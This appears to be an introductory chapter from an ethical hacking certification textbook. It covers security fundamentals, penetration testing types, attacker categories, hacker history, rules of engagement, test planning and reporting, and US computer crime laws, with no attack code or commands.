Availability is the third leg of the CIA triad. Availability simply means that when a legitimate user needs the information, it should be available. As an example, access to a backup facility 24x7 does not help if there are no updated backups from which to restore. Backups are one of the ways that availability is ensured. Backups provide a copy of critical information should files and data be destroyed or equipment fail. Failover equipment is another way to ensure availability. Systems such as redundant array of inexpensive disks (RAID) and subscription services such as redundant sites (hot, cold, and warm) are two other examples. Disaster recovery is tied closely to availability, as it’s all about getting critical systems up and running quickly. Denial of service (DoS) is an attack against availability. Although these attacks might not give access to the attacker, they dodeny legitimate users the access they require.

Assets, Threats, and Vulnerabilities

Objectives:

Recall essential terminology
List the elements of security

As with any new technology topic, terminology is used that must be learned to better understand the field. To be a security professional, you need to understand the relationship between threats, assets, and vulnerabilities.

Risk is the probability or likelihood of the occurrence or realization of a threat. There are three basic elements of risk: assets, threats, and vulnerabilities. Let’s discuss each of these.

An asset is any item of economic value owned by an individual or corporation. Assets can be real — such as routers, servers, hard drives, and laptops — or assets can be virtual, such as formulas, databases, spreadsheets, trade secrets, and processing time. Regardless of the type of asset discussed, if the asset is lost, damaged, or compromised, there can be an economic cost to the organization.

A threat is any agent, condition, or circumstance that could potentially cause harm, loss, damage, or compromise to an IT asset or data asset. From a security professional’s perspective, threats can be categorized as events that can affect the confidentiality, integrity, or availability of the organization’s assets. These threats can result in destruction, disclosure, modification, corruption of data, or denial of service. Some examples of the types of threats an organization can face include the following:

Unauthorized Access

If userids and passwords to the organization’s infrastructure are obtained and confidential information is compromised and unauthorized, access is granted to the unauthorized user who obtained the userids and passwords.

Stolen/Lost/Damaged/Modified Data

A critical threat can occur if the information is lost, damaged, or unavailable to legitimate users.

Disclosure of Confidential Information

Anytimethere is a disclosure of confidential information, it can be a critical threat to an organization if that disclosure causes loss of revenue, causes potential liabilities, or provides a competitive advantage to an adversary.

Hacker Attacks

An insider or outsider who is unauthorized and purposely attacks an organization’s components, systems, or data.

Cyber Terrorism

Attackers whotarget critical, national infrastructures such as water plants, electric plants, gas plants, oil refineries, gasoline refineries, nuclear power plants, waste management plants, and so on.

Viruses and Malware

An entirecategory of software tools that are malicious and are designed to damage or destroy a system or data.

Denial of Service (DoS) or Distributed Denial of Service Attacks

An attack against availability that isdesigned to bring the network and/or access to a particular TCP/IP host/server to its knees by flooding it with useless traffic. Many DoSattacks, such as the Ping of Death and Teardrop, exploit limitations in the TCP/IP protocols. Like malware, hackers constantly develop new DoS attacks, so they form a continuous threat.

Natural Disasters, Weather, or Catastrophic Damage

Hurricanes, such as Katrina that hit New Orleans in 2005, storms, weather outages, fire, flood, earthquakes, and other natural events compose an ongoing threat.

If the organization is vulnerable to any of these threats, there is an increased risk of successful attack.

A vulnerability is a weakness in the system design, implementation, software or code, or the lack of a mechanism. A specific vulnerability might manifest as anything from a weakness in system design to the implementation of an operational procedure. Vulnerabilities might be eliminated or reduced by the correct implementation of safeguards and security countermeasures.

Vulnerabilities and weaknesses are common with software mainly because there isn’t any perfect software or code in existence. Vulnerabilities in software can be found in each of the following:

Firmware

This software is usually stored in ROM and loaded during system power up.

Operating System

This operating system software is loaded in workstations and servers.

Configuration Files

The configuration file and configuration setup for the device.

Application Software

The application or executable file that is run on a workstation or server.

Software Patch

This is a small piece of software or code snippet that the vendor or developer of the software typically releases as software updates, software maintenance, and known software vulnerabilities or weaknesses.

Vulnerabilities are not the only concern the ethical hacker will have. Exploits are a big concern, as they are a common mechanism used to gain access. That’s discussed next.

Defining an Exploit

An exploit refers to a piece of software, tool, or technique that takes advantage of a vulnerability that leads to privilege escalation, loss of integrity, or denial of service on a computer system. Exploits are dangerous because all software has vulnerabilities; hackers and perpetrators know that there are vulnerabilities and seek to take advantage of them. Although most organizations attempt to find and fix vulnerabilities, some organizations lack sufficient funds for securing their networks. Even those that do are burdened with the fact that there is a window between when a vulnerability is discovered and when a patch is available to prevent the exploit. The more critical the server, the slower it is typically patched. Management might be afraid of interrupting the server or afraid that the patch might affect stability or performance. Finally, the time required to deploy and install the software patch on production servers and workstations exposes an organization’s IT infrastructure to an additional period of risk.

Security Testing

Objective:

Define the modes of ethical hacking
Security testing is the primary job of ethical hackers. These tests might be configured in such way that the ethical hackers have no knowledge, full knowledge, or partial knowledge of the target of evaluation (TOE).

NOTE

The term target of evaluation (TOE) is widely used to identify an IT product or system that is the subject of an evaluation. The EC-Council and some security guidelines and standards use the term to describe systems that are being tested to measure their confidentiality, integrity, and availability.

The goal of the security test (regardless of type) is for the ethical hacker to test the security system and evaluate and measure its potential vulnerabilities.

No Knowledge Tests (Blackbox)

No knowledge testing is also known as blackbox testing. Simply stated, the security team has no knowledge of the target network or its systems. Blackbox testing simulates an outsider attack as outsiders usually don’t know anything about the network or systems they are probing. The attacker must gather all types of information about the target to begin to profile its strengths and weaknesses. The advantages of blackbox testing include

The test is unbiased as the designer and the tester are independent of each other. The tester has no prior knowledge of the network or target being examined. Therefore there are no preset thoughts or ideas about the function of the network. A wide range of resonances work and are typically done to footprint the organization, which can help identify information leakage. The test examines the target in much the same way as an external attacker.

The disadvantages of blackbox testing include
It can take more time to perform the security tests.
It is usually more expensive as it takes more time to perform.
It focuses only on what external attackers see, while in reality, most attacks are launched by insiders.

Full Knowledge Testing (Whitebox)

Whitebox testing takes the opposite approach of blackbox testing. This form of security test takes the premise that the security tester has full knowledge of the network, systems, and infrastructure. This information allows the security tester to follow a more structured approach and not only review the information that has been provided but also verify its accuracy. So, although blackbox testing will typically spend more time gathering information, whitebox testing will spend that time probing for vulnerabilities.

Partial Knowledge Testing (Graybox)

In the world of software testing, graybox testing is described as a partial knowledge test. EC-Council literature describes graybox testing as a form of internal test. Therefore, the goal is to determine what insiders can access. This form of test might also prove useful to the organization as so many attacks are launched by insiders.

Types of Security Tests

Objective:

State security testing methodologies

Several different types of security tests can be performed. These can range from those that merely examine policy to those that attempt to hack in from the Internet and mimic the activities of true hackers. These security tests are also known by many names, including

Vulnerability Testing
Network Evaluations
Red Team Exercises
Penetration Testing
Host Vulnerability Assessment
Vulnerability Assessment
Ethical Hacking

No matter what the security test is called, it is carried out to make a systematic examination of an organization’s network, policies, and security controls. Its purpose is to determine the adequacy of security measures, identify security deficiencies, provide data from which to predict the effectiveness of potential security measures, and confirm the adequacy of such measures after implementation. Security tests can be defined as one of three types, which include highlevel assessments, network evaluations, and penetration tests. Each is described as follows:

High-level assessments

Also called a level I assessment, it is a top-down look at the organization’s policies, procedures, and guidelines. This type of vulnerability assessment does not include any hands-on testing. The purpose of a top-down assessment is to answer three questions: Do the applicable policies exist?

Are they being followed?
Is there content sufficient to guard against potential risk?

Network evaluations

Also called a level II assessment, it has all the elements specified in a level I assessment plus includes hands-on activities. These hands-on activities would include information gathering, scanning, vulnerability assessment scanning, and other hands-on activities. Throughout this book, tools and techniques used to perform this type of assessment are discussed.

Penetration tests

Unlike assessments and evaluations, penetration tests are adversarial in nature. Penetration tests are also referred to as level III assessments. These events typically take on an adversarial role and look to see what the outsider can access and control. Penetration tests are less concerned with policies and procedures and are more focused on finding low hanging fruit and seeing what a hacker can accomplish on this network.

NOTE

Just remember that penetration tests are not fully effective if an organization does not have the policies and procedures in place to control security. Without adequate policies and procedures, it’s almost impossible to implement real security. Documented controls are required.

How do ethical hackers play a role in these tests? That’s the topic of the next section.

Hacker and Cracker Descriptions

Objective:

Discuss malicious hackers

To understand your role as an ethical hacker, it is important to know the players. Originally, the term hacker was used for a computer enthusiast. A hacker was a person who enjoyed understanding the internal workings of a system, computer, and computer network. Over time, the popular press began to describe hackers as individuals who broke into computers with malicious intent. The industry responded by developing the word cracker, which is short for criminal hacker. The term cracker was developed to describe individuals who seek to compromise the security of a system without permission from an authorized party. With all this confusion over how to distinguish the good guys from the bad guys, the term ethical hacker was coined. An ethical hacker is an individual who performs security tests and other vulnerability assessment activities to help organizations secure their infrastructures. Sometimes ethical hackers are referred to as White Hat Hackers.

Hacker motives and intentions vary. Some hackers are strictly legitimate, whereas others routinely break the law. Let’s look at some common categories:

Whitehat Hackers

These individuals perform ethical hacking to help secure companies and organizations. Their belief is that you must examine your network in the same manner as a criminal hacker to better understand its vulnerabilities. Reformed Blackhat Hackers — These individuals often claim to have changed their ways and that they can bring special insight into the ethical hacking methodology.

Grayhat Hackers —

These individuals typically follow the law but sometimes venture over to the darker side of blackhat hacking. It would be unethical to employ these individuals to perform security duties for your organization as you are never quite clear where they stand.

Who Attackers Are
Ethical hackers are up against several individuals in the battle to secure the network. The following list presents some of the more commonly used terms for these attackers:

Phreakers —

The original hackers. These individuals hacked telecommunication and PBX systems to explore the capabilities and make free phone calls. Their activities include physical theft, stolen calling cards, access to telecommunication services, reprogramming of telecommunications equipment, and compromising userids and passwords to gain unauthorized use of facilities, such as phone systems and voice mail.

Script/Click Kiddies —

A term used to describe often younger attackers who use widely available freeware vulnerability assessment tools and hacking tools that are designed for attacking purposes only. These attackers typically do not have any programming or hacking skills and, given the techniques used by most of these tools, can be defended against with the proper security controls and risk mitigation strategies.

Disgruntled Employee —

Employees who have lost respect and integrity for the employer. These individuals might or might not have more skills than the script kiddie. Many times, their rage and anger blind them. They rank as a potentially high risk because they have insider status, especially if access rights and privileges were provided or managed by the individual.

Whackers —

Whackers are typically newbies who focus their limited skills and abilities on attacking wireless LANs and WANs.

Software Cracker/Hacker —

Individualswho have skills in reverse engineering software programs and, in particular, licensing registration keys used by software vendors when installing software onto workstations or servers. Although many individuals are eager to partake of their services, anyone who downloads programs with cracked registration keys are breaking the law and can be a greater potential risk and subject to malicious code and malicious software threats that might have been injected into the code.

Cyber-Terrorists/Cyber-Criminals

An increasing category of threat that can be used to describe individuals or groups of individuals who are typically funded to conduct clandestine or espionage activities on governments, corporations, and individuals in an unlawful manner. These individuals are typically engaged in sponsored acts of defacement; DoS/DDoS attacks identify theft, financial theft, or worse, compromising critical infrastructures in countries, such as nuclear power plants, electric plants, water plants, and so on.

System Cracker/Hacker —

Elite hackers who have specific expertise in attacking vulnerabilities of systems and networks by targeting operating systems. These individuals get the most attention and media coverage because of the globally affected viruses, worms, and Trojans that are created by System Crackers/Hackers. System Crackers/Hackers perform interactive probing activities to exploit security defects and security flaws in network operating systems and protocols.

Now that you have an idea who the legitimate security professionals are up against, let’s briefly discuss some of the better known crackers and hackers.

Hacker and Cracker History

The well-known hackers of today grew out of the phone phreaking activities of the 1960s. In 1969, Mark Bernay, also known as “The Midnight Skulker,” wrote a computer program that allowed him to read everyone else’s ID and password at the organization where he worked. Although he was eventually fired, no charges were ever filed, as computer crime was so new, there were no laws against it.

Computer innovators include:

Steve Wozniak and Steve Jobs —

Members of the Homebrew Computer Club of Palo Alto. John Draper was also a member of this early computer club. Wozniak and Jobs went on to become co-founders of Apple Computer.

Dennis Ritchie and Ken Thompson —

While not criminal hackers, their desire for discovery led to the development of UNIX in 1969 while working at Bell Labs.

Well-known hackers and phreakers include:

John Draper —

Dubbed “Captain Crunch” for finding that a toy whistle shipped in boxes of Captain Crunch cereal had the same frequency as the trunking signal of AT&T, 2,600Hz. This discovery was made with the help of Joe Engressia. Although Joe was blind, he could whistle into a phone and produce a perfect 2,600Hz frequency. This tone was useful for placing free long distance phone calls.

Mark Abene —

Known as Phiber Optik. Mark helped form the “Masters of Deception” in 1990. Before being arrested in 1992, they fought an extended battle with “Legion of Doom.”

Kevin Poulsen —

Known asDark Dante. Kevin took over all phones in Los Angeles in 1990 to ensure victory in a phone “call-in contest,” for a Porsche 944. He was later arrested.

Robert Morris —

The son of a chief scientist at the NSA. Morris accidentally released the “Morris Worm” in 1988 from a Cornell University lab. This is now widely seen as the first release of a worm onto the Internet.

Kevin Mitnick —

Known as “Condor,” Mitnick was the first hacker to hit the FBI Most Wanted list. Broke into such organizations as Digital Equipment Corp., Motorola, Nokia Mobile Phones, Fujitsu, and others. He was arrested in 1994 and has now been released and works as a legitimate security consultant.

Vladimir Levin —

A Russian hacker who led a team of hackers who siphoned off $10 million from Citibank and transferred the money to bank accounts around the world. Levin eventually stood trial in the United States and was sentenced to three years in prison. Authorities recovered all but $400,000.00 of the stolen money.

Adrian Lamo —

Known asthe “Homeless Hacker” because of his transient lifestyle. Lamo spent his days squatting in abandoned buildings and traveling to Internet cafes, libraries, and universities to exploit security weaknesses in high-profile company networks, such as Microsoft, NBC, and the New York Times. He was eventually fined and prosecuted for the New York Times hack.

Although this list does not include all the hackers, crackers, and innovators of the computer field, it should give you an idea of some of the people who have made a name for themselves in this industry. Let’s now talk more about ethical hackers.

Ethical Hackers

Objective:

Define ethical hacking

Ethical hackers perform penetration tests. They perform the same activities a hacker would but without malicious intent. They must work closely with the host organization to understand what the organization is trying to protect, who they are trying to protect these assets from, and how much money and resources the organization is willing to expend to protect the assets.

By following a methodology similar to that of an attacker, ethical hackers seek to see what type of public information is available about the organization. Information leakage can reveal critical details about an organization, such as its structure, assets, and defensive mechanisms. After the ethical hacker gathers this information, it will be evaluated to determine whether it poses any potential risk. The ethical hacker further probes the network at this point to test for any unseen weaknesses.

Penetration tests are sometimes performed in a double blind environment. This means that the internal security team has not been informed of the penetration test. This serves as an important purpose, allowing management to gauge the security team’s responses to the ethical hacker’s probing and scanning. Do they notice the probes or have the attempted attacks gone unnoticed? Now that the activities performed by ethical hackers have been described, let’s spend some time discussing the skills that ethical hackers need, the different types of security tests that ethical hackers perform, and the ethical hacker rules of engagement.

Required Skills of an Ethical Hacker

Objective:

Describe ethical hackers and their duties

Ethical hackers need hands-on security skills. Although you do not have to be an expert in everything, you should have an area of expertise. Security tests are typically performed by teams of individuals, where each individual typically has a core area of expertise. These skills include:

Routers —

Knowledgeof routers, routing protocols, and access control lists (ACLs). Certifications such a Cisco Certified Network Associate (CCNA) or Cisco Certified Internetworking Expert (CCIE) can be helpful.

Microsoft —

Skills in the operation, configuration, and management of Microsoft-based systems. These can run the gamut from Windows NT to Windows 2003. These individuals might be Microsoft Certified Administrator (MCSA) or Microsoft Certified Security Engineer (MCSE) certified.

Linux —

A good understanding of the Linux/UNIX OS. This includes security setting, configuration, and services such as Apache. These individuals may be Red Hat, or Linux+ certified.

Firewalls —

Knowledge of firewall configuration and the operation of intrusion detection systems (IDS) and intrusion prevention systems (IPS) can be helpful when performing a security test. Individuals with these skills may be certified in Cisco Certified Security Professional (CCSP) or Checkpoint Certified Security Administrator (CCSA).

Mainframes —

Although mainframes do not hold the position of dominance they once had in business, they still are widely used. If the organization being assessed has mainframes, the security teams would benefit from having someone with that skill set on the team.

Network protocols —

Most modern networks are Transmission Control Protocol/ Internet Protocol (TCP/IP), although you might still find the occasional network that uses Novell or Apple routing information. Someone with good knowledge of networking protocols, as well as how these protocols function and can be manipulated, can play a key role in the team. These individuals may possess certifications in other OSes, hardware, or even posses a Network+ or Security+ certification.

Project management —

Someone will have to lead the security test team, and if you are chosen to be that person, you will need a variety of the skills and knowledge types listed previously. It can also be helpful to have good project management skills. After all, you will be leading, planning, organizing, and controlling the penetration test team. Individuals in this role may benefit from having Project Management Professional (PMP) certification.

On top of all this, ethical hackers need to have good report writing skills and must always try to stay abreast of current exploits, vulnerabilities, and emerging threats as their goals are to stay a step ahead of malicious hackers.

Modes of Ethical Hacking

With all this talk of the skills that an ethical hacker must have, you might be wondering how the ethical hacker can put these skills to use. An organization’s IT infrastructure can be probed, analyzed, and attacked in a variety of ways. Some of the most common modes of ethical hacking are shown here:

Insider attack —

This ethical hack simulates the types of attacks and activities that could be carried out by an authorized individual with a legitimate connection to the organization’s network.

Outsider attack —

This ethical hack seeks to simulate the types of attacks that could be launched across the Internet. It could target Hypertext Transfer Protocol (HTTP), Simple Mail Transfer Protocol (SMTP), Structured Query Language (SQL), or any other available service.

Stolen equipment attack —

This simulation is closely related to a physical attack as it targets the organization’s equipment. It could seek to target the CEO’s laptop or the organization’s backup tapes. No matter what the target, the goal is the same — extract critical information, usernames, and passwords.

Physical entry —

This simulationseeks to test the organization’s physical controls. Systems such as doors, gates, locks, guards, closed circuit television (CCTV), and alarms are tested to see whether they can be bypassed.

Bypassed authentication attack —

This simulation is tasked with looking for wireless access points (WAP) and modems. The goal is to see whether these systems are secure and offer sufficient authentication controls. If the controls can be bypassed, the ethical hacker might probe to see what level of system control can be obtained.

Social engineering attack —

This simulation does not target technical systems or physical access. Social engineering attacks target the organization’s employees and seek to manipulate them to gain privileged information. Proper controls, policies, and procedures can go a long way in defeating this form of attack.

Rules of Engagement —

Every ethical hacker must abide by a few simple rules when performing the tests described previously. If not, bad things can happen to you, which might include loss of job, civil penalty, or even jail time.

Never exceed the limits of your authorization —

Every assignment will have rules of engagement. These not only include what you are authorized to target, but also the extent that you are authorized to control such system. If you are only authorized to obtain a prompt on the target system, downloading passwords and starting a crack on these passwords would be in excess of what you have been authorized to do.

The tester should protect himself by setting up limitation as far as damage is concerned. There has to be an NDA between the client and the tester to protect them both. There is a good example of a get out of jail document at

HYPERLINK

Be ethical —

That’s right; the big difference between a hacker and an ethical hacker is the word ethics. Ethics is a set of moral principles about what is correct or the right thing to do. Ethical standards are sometimes different from legal standards in that laws define what we must do, whereas ethics define what we should do.

The OSSTMM — An Open Methodology

In December 2001, the Open Source Security Testing Methodology Manual (OSSTMM) began. Hundreds of people contributed knowledge, experience, and peer-review to the project. Eventually, as the only publicly available methodology that tested security from the bottom of operations and up (as opposed to from the policy on down), it received the attention of businesses, government agencies, and militaries around the world. It also scored success with little security startups and independent ethical hackers who wanted a public source for client assurance of their security testing services. The primary purpose of the OSSTMM is to provide a scientific methodology for the accurate characterization of security through examination and correlation in a consistent and reliable way. Great effort has been put into the OSSTMM to assure reliable cross-reference to current security management methodologies, tools, and resources. This manual is adaptable to penetration tests, ethical hacking, security assessments, vulnerability assessments, red-teaming, blue-teaming, posture assessments, and security audits. Your primary purpose for using it should be to guarantee facts and factual responses, which in turn assures your integrity as a tester and the organization you are working for, if any. The end result is a strong, focused security test with clear and concise reporting. www.isecom.org is the main site for the nonprofit organization, ISECOM, maintaining the OSSTMM and many other projects. This “in the field” segment was contributed by Pete Herzog, Managing Director, ISECOM.

Maintain confidentiality —

During security evaluations, you will likely be exposed to many types of confidential information. You have both a legal and moral standard to treat this information with the utmost privacy. This information should not be shared with third parties and should not be used by you for any unapproved purposes. There is an obligation to protect the information sent between the tester and the client. This has to be specified in the agreement.

Do no harm —

It’s ofutmost importance that you do no harm to the systems you test. Again, a major difference between a hacker and an ethical hacker is that you should do no harm. Misused, security tools can lock out critical accounts, cause denial of service (DoS), and crash critical servers or applications. Care should be taken to prevent these events unless that is the goal of the test.

Test Plans — Keeping It Legal

Most of us probably make plans before we take a big trip or vacation. We think about what we want to see, how we plan to spend our time, what activities are available, and how much money we can spend and not regret it when the next credit card bill arrives. Ethical hacking is much the same minus the credit card bill. Many details need to be worked out before a single test is performed. If you or your boss is tasked with managing this project, some basic questions need to be answered, such as what’s the scope of the assessment, what are the driving events, what are the goals of the assessment, what will it take to get approval, and what’s needed in the final report.

Before an ethical hack test can begin, the scope of the engagement must be determined.

Defining the scope of the assessment is one of the most important parts of the ethical hacking process. At some point, you will be meeting with management to start the discussions of the how and why of the ethical hack. Before this meeting ever begins, you will probably have some idea what management expects this security test to accomplish. Companies that decide to perform ethical hacking activities don’t do so in a vacuum. You need to understand the business reasons behind this event. Companies can decide to perform these tests for various reasons.

Some of the most common reasons are listed as follows:

A breach in security - One or more events has occurred that has highlighted a lapse in security. It could be that an insider was able to access data that should have been unavailable to him, or it could be that an outsider was able to hack the organization’s web server.

Compliance with state, federal, regulatory, or other law or mandate — Compliance with state or federal laws is another event that might be driving the assessment. Companies can face huge fines and potential jail time if they fail to comply with state and federal laws. The Gramm-Leach-Bliley Act (GLBA), Sarbanes-Oxley (SOX), and Health Insurance Portability and Accountability Act (HIPAA) are three such laws. HIPAA requires organizations to perform a vulnerability assessment. Your organization might decide to include ethical hacking into this test regime.

NOTE

One such standard that the organization might be attempting to comply with is ISO 17799. This information security standard was first published in December 2000 by the International Organization for Standardization and the International Electrotechnical Commission. This code of practice for information security management is considered a security standard benchmark.
. Security Policy
. Security Organization
. Asset Control and Classification
. Environmental and Physical Security
. Employee Security
. Computer and Network Management
. Access Controls
. System Development and Maintenance
. Business Continuity Planning
. Compliance

Due diligence — Due diligence is another one of the reasons a company might decide to perform a penetration test. The new CEO might want to know how good the organization’s security systems really are, or it could be that the company is scheduled to go through a merger or is acquiring a new firm. If so, the penetration test might occur before the purchase or after the event. These assessments are usually going to be held to a strict timeline. There is only a limited amount of time before the purchase and if performed afterward, the organization will probably be in a hurry to integrate the two networks as soon as possible.

Test Phases

Security assessments in which ethical hacking activities will take place are composed of three phases. These include the scoping of the assessment in which goals and guidelines are established, performing the assessment, and performing post assessment activities. The post assessment activities are when the report and remediation activities would occur. Figure 1.2 shows the three phases of the assessment and their typical times.

Establishing Goals

The need to establish goals is also critical. Although you might be ready to jump in and begin hacking, a good plan will detail the goals and objectives of the test. Some common goals include system certification and accreditation, verification of policy compliance, and proof that the IT infrastructure has the capability to defend against technical attacks.

Are the goals to certify and accredit the systems being tested? Certification is a technical evaluation of the system that can be carried out by independent security teams or by the existing staff. Its goal is to uncover any vulnerabilities or weaknesses in the implementation. Your goal will be to test these systems to make sure that they are configured and operating as expected, that they are connected to and communicate with other systems in a secure and controlled manner, and that they handle data in a secure and approved manner.

If the goals of the penetration test are to determine whether current policies are being followed, the test methods and goals might be somewhat different. The security team will be looking at the controls implemented to protect information being stored, being transmitted, or being processed. This type of security test might not have as much hands-on hacking, but might use more social engineering techniques and testing of physical controls. You might even direct one of the team members to perform a little dumpster diving.

The goal of a technical attack might be to see what an insider or outsider can access. Your goal might be to gather information as an outsider and then use that data to launch an attack against a web server or externally accessible system.

Regardless of what type of test you are asked to perform, there are some basic questions you can ask to help establish the goals and objectives of the tests. These include the following:

What is the organization’s mission?
What specific outcomes does the organization expect?
What is the budget?
When will tests be performed — during work hours, after hours, or weekends?
How much time will the organization commit to completing the security evaluation?
Will insiders be notified?
Will customers be notified?
How far will the test proceed? Root the box, gain a prompt, or attempt to retrieve another prize, such as the CEO’s password.
Who do you contact should something go wrong?
What are the deliverables?
What outcome is management seeking from these tests?

Getting Approval

Getting approval is a critical event in the testing process. Before any testing actually begins, you need to make sure that you have a plan that has been approved in writing. If this is not done, you and your team might face unpleasant consequences, which might include being fired or even criminal charges.

TIP

Written approval is the most critical step of the testing process. You should never perform any tests without written approval.

If you are an independent consultant, you might also get insurance before starting any type of test. Umbrella policies and those that cover errors and omissions are commonly used. These types of liability policies can help protect you should anything go wrong. To help make sure that the approval process goes smoothly, you should make sure that someone is the champion of this project. This champion or project sponsor is the lead contact to upper management and your contact person. Project sponsors can be instrumental in helping you gain permission to begin testing and also to provide you with thefunding and materials needed to make this a success.

NOTE

Management support is critical in a security test to be successful (or in Kartik and Travis’ case, from being expeled).

Ethical Hacking Report

Objective:

Describe test deliverables

Although we have not actually begun testing, you do need to start thinking about the final report. Throughout the entire process, you should be in close contact with management to keep them abreast of your findings. There shouldn’t be any big surprises when you submit the report. While you might have found some serious problems, they should be discussed with management before the report is written and submitted. The goal is to keep them in the loop and advised of the status of the assessment. If you find items that present a critical vulnerability, you should stop all tests and immediately inform management. Your priority should always be the health and welfare of the organization.

The report itself should detail the results of what was found. Vulnerabilities should be discussed as should the potential risk they pose. Although people aren’t fired for being poor report writers, don’t expect to be promoted or praised for your technical findings if the report doesn’t communicate your findings clearly. The report should present the results of the assessment in an easy, understandable, and fully traceable way. The report should be comprehensive and self-contained. Most reports contain the following sections:

Introduction
Statement of work performed
Results and conclusions
Recommendations

Since most companies are not made of money and cannot secure everything, you should rank your recommendations so that the ones with the highest risk/highest probability are at the top of the list.

The report needs to be adequately secured while in electronic storage. Encryption should be used. The printed copy of the report should be marked “Confidential” and while in its printed form, care should be taken to protect the report from unauthorized individuals. You have an ongoing responsibility to ensure the safety of the report and all information gathered. Most consultants destroy reports and all test information after a contractually obligated period of time.

TIP

The report is a piece of highly sensitive material and should be protected in storage and when in printed form.

Ethics and Legality

Objective:

Know the laws dealing with computer crimes and their implications Recent FBI reports on computer crime indicate that unauthorized computer use in 2005 was reported at 56 percent of U.S. companies surveyed. This is an increase of 3 percent from 2004. Various website attacks were up 6 percent from 2004. These figures indicate that computer crime caused by hackers continues to increase. A computer or network can become the victim of a crime committed by a hacker. Hackers use computers as a tool to commit a crime or to plan, track, and control a crime against other computers or networks. Your job as an ethical hacker is to find vulnerabilities before the attackers do and help prevent them from carrying out malicious activities. Tracking and prosecuting hackers can be a difficult job as international law is often ill-suited to deal with the problem. Unlike conventional crimes that occur in one location, hacking crimes might originate in India, use a system based in Singapore, and target a computer network located in Canada. Each country has conflicting views on what constitutes cyber crime. Even if hackers can be punished, attempting to do so can be a legal nightmare. It is hard to apply national borders to a medium such as the Internet that is essentially borderless.

NOTE

Some individuals approach computing and hacking from the social perspective and believethat hacking can promote change. These individuals are known as hactivists, these “hacker activists” use computers and technology for hi-tech campaigning and social change. They believe that defacing websites and hacking servers is acceptable as long as it promotes their goals. Regardless of their motives, hacking remains illegal and they are subject to the same computer crime laws as any other criminal.

Overview of U.S. Federal Laws
Although some hackers might have the benefit of bouncing around the globe from system to system, your work will likely occur within the confines of the host nation. The United States and some other countries have instigated strict laws to deal with hackers and hacking. During the past five years, the U.S. federal government has taken an active role in dealing with computer, Internet, privacy, corporate threats, vulnerabilities, and exploits. These are laws you should be aware of and not become entangled in. Hacking is covered under law Title 18: Crimes and Criminal Procedure: Part 1: Crimes: Chapter 47: Fraud and False Statements: Section 1029 and 1030. Each are described here:

Section 1029
Fraud and related activity with access devices. This law gives the U.S. federal government the power to prosecute hackers that knowingly and with intent to defraud, produce, use, or traffic in one or more counterfeit access devices. Access devices can be an application or hardware that is created specifically to generate any type of access credentials, including passwords, credit card numbers, long distance telephone service access codes, PINs, and so on for the purpose of unauthorized access.

Section 1030
Fraud and related activity in connection with computers. The law covers just about any computer or device connected to a network or Internet. It mandates penalties for anyone who accesses a computer in an unauthorized manner or exceeds one’s access rights. This a powerful law because companies can use it to prosecute employees when they use the rights the companies have given them to carry out fraudulent activities.

TIP

Sections 1029 and 1030 are the main statutes that address computer crime in U.S. federal law. Understand its basic coverage and penalties.

The Evolution of Hacking Laws
In 1985, hacking was still in its infancy in England. Because of the lack of hacking laws, some British hackers felt there was no way they could be prosecuted. Triludan the Warrior was one of these individuals. Besides breaking into the British Telecom system, he also broke an admin password for Prestel. Prestel was a dialup service that provided online services, shopping, email, sports, and weather. One user of Prestel was His Royal Highness, Prince Phillip. Triludan broke into the Prince’s mailbox along with various other activities, such as leaving the Prestel system admin messages and taunts. Triludan the Warrior was caught on April 10, 1985, and was charged with five counts of forgery, as no hacking laws existed. After several years and a 3.5 million dollar legal battle, Triludan was eventually acquitted. Others were not so lucky because in 1990, Parliament passed The Computer Misuse Act, which made hacking attempts punishable by up to five years in jail. Today, the UK, along with most of the Western world, has extensive laws against hacking.

The federal punishment described in Sections 1029 and 1030 for hacking into computers ranges from a fine or imprisonment for no more than one year. It might also include a fine and imprisonment for no more than twenty years. This wide range of punishment depends on the seriousness of the criminal activity and what damage the hacker has done. Other federal laws that address hacking include:

Electronic Communication Privacy Act
Mandates provisions for access, use, disclosure, interception, and privacy protections of electronic communications. The law encompasses USC Sections 2510 and 2701. According to the U.S. Code, electronic communications “means any transfer of signs, signals, writing, images, sounds, data, or intelligence of any nature transmitted in whole or in part by a wire, radio, electromagnetic, photo electronic, or photo optical system that affects interstate or foreign commerce.” This law makes it illegal for individuals to capture communication in transit or in storage. Although these laws were originally developed to secure voice communications, it now covers email and electronic communication.

Computer Fraud and Abuse Act of 1984
The Computer Fraud and Abuse Act (CFAA) of 1984 protects certain types of information that the government maintains as sensitive. The Act defines the term “classified computer,” and imposes punishment for unauthorized or misused access into one of these protected computers or systems. The Act also mandates fines and jail time for those who commit specific computer - related actions, such as trafficking in passwords or extortion by threatening a computer. In 1992, Congress amended the CFAA to include malicious code, which was not included in the original Act.

The Cyber Security Enhancement Act of 2002 - This Act mandates that hackers who carry out certain computer crimes might now get life sentences in jail if the crime could result in another’s bodily harm or possible death. This means that if hackers disrupt a 911 system, they could spend the rest of their days in jail.

The Uniting and Strengthening America by Providing Appropriate Tools Required to Intercept and Obstruct Terrorism (USA PATRIOT) Act of 2001 - Originally passed because of the World Trade Center attack on September 11, 2001. Strengthens computer crime laws and has been the subject of some controversy. This Act gives the U.S. government extreme latitude in pursuing criminals. The Act permits the U.S. government to monitor hackers without a warrant and perform sneak and peek searches.

The Federal Information Security Management Act (FISMA) - Signed into law in 2002 as part of the E-Government Act of 2002, replacing the Government Information Security Reform Act (GISRA). FISMA was enacted to address the information security requirements for non-national security government agencies. FISMA provides a statutory framework for securing government owned and operated IT infrastructures and assets.

Federal Sentencing Guidelines of 1991 - Provide guidelines to judges so that sentences would be handed down in a more uniform manner.

Economic Espionage Act of 1996 - Defines strict penalties for those accused of espionage.

U.S. Child Pornography Prevention Act of 1996 - Enacted to combat and reduce the use of computer technology to produce and distribute pornography.

U.S. Health Insurance Portability and Accountability Act (HIPPA) - Established privacy and security regulations for the health care industry.

Summary

This lesson proves that security is based on the CIA triad. This triad considers confidentiality, integrity, and availability. The application of the principles of the CIA triad must be applied to Information Technology (IT) networks and their data. The data must be protected in storage and in transit.

Because the organization cannot provide complete protection for all of its assets, a system must be developed to rank risk and vulnerabilities. Organizations must seek to identify high risk and high impact events for protective mechanisms. Part of the job of an ethical hacker is to identify potential vulnerabilities to these critical assets and test systems to see whether they are vulnerable to exploits.

